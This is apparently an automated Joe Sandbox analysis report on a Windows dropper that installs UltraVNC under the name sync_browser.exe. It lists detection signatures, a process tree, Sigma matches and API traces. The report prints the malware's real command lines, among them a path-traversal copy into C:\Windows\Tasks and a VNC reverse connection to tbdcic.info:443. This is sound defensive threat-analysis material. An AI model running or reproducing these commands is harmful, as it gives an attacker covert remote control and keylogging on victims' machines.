Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Olz7TmvkEW.exe

Overview

General Information

Sample name:Olz7TmvkEW.exe
renamed because original name is a hash value
Original sample name:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
Analysis ID:1579877
MD5:539b0fc32045de3013d00850827654aa
SHA1:eed973e0a66dab8e80a1403acd7beab580c34f94
SHA256:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Olz7TmvkEW.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\Olz7TmvkEW.exe" MD5: 539B0FC32045DE3013D00850827654AA)
    • cmd.exe (PID: 4596 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5344 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 424 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6120 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 6252 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 5512 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 3660 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 6120 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 7188 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7932 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8084 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 7788 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 7412 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 8224 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 8236 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8280 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 8436 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Windows\Tasks\GIjul8.QTIrrrJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Windows\Tasks\sync_browser.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
        SourceRuleDescriptionAuthorStrings
        0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 9 entries
                  SourceRuleDescriptionAuthorStrings
                  26.0.sync_browser.exe.7ff7d5930000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    26.2.sync_browser.exe.7ff7d5930000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      21.2.sync_browser.exe.7ff7d5930000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        21.0.sync_browser.exe.7ff7d5930000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 424, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7788, ProcessName: sync_browser.exe
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 424, TargetFilename: C:\Windows\Tasks\conhost.exe
                          Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 424, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, ProcessId: 8224, ProcessName: sync_browser.exe
                          Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 6420, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4596, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 6420, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4596, ProcessName: cmd.exe
                          Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 424, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7788, ProcessName: sync_browser.exe
                          No Suricata rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
                          Source: Olz7TmvkEW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr
                          Source: Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,21_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,21_2_00007FF7D5935910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,21_2_00007FF7D59EA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,21_2_00007FF7D595C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,26_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,26_2_00007FF7D5935910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,26_2_00007FF7D59EA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,26_2_00007FF7D595C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,21_2_00007FF7D5956DD1
                          Source: Joe Sandbox ViewASN Name: RSHB-ASRU RSHB-ASRU
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D593C0C0 _wgetenv,send,recv,send,recv,21_2_00007FF7D593C0C0
                          Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                          Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://forum.uvnc.com
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ocsp.thawte.com0
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://www.uvnc.com
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                          Source: 2D85F72862B55C4EADD9E66E06947F3D.13.drString found in binary or memory: http://x1.i.lencr.org/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,000000000_2_00408630
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5931DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,21_2_00007FF7D5931DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5931DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,21_2_00007FF7D5931DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_00007FF7D59613A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D5931DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,26_2_00007FF7D5931DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_00007FF7D59613A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5931AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,21_2_00007FF7D5931AE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5933770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,21_2_00007FF7D5933770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5980650 VkKeyScanA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,MapVirtualKeyA,GetKeyState,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,MapVirtualKeyA,MapVirtualKeyA,GetAsyncKeyState,GetAsyncKeyState,CreateThread,CloseHandle,WinExec,MapVirtualKeyA,21_2_00007FF7D5980650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,21_2_00007FF7D59474C0
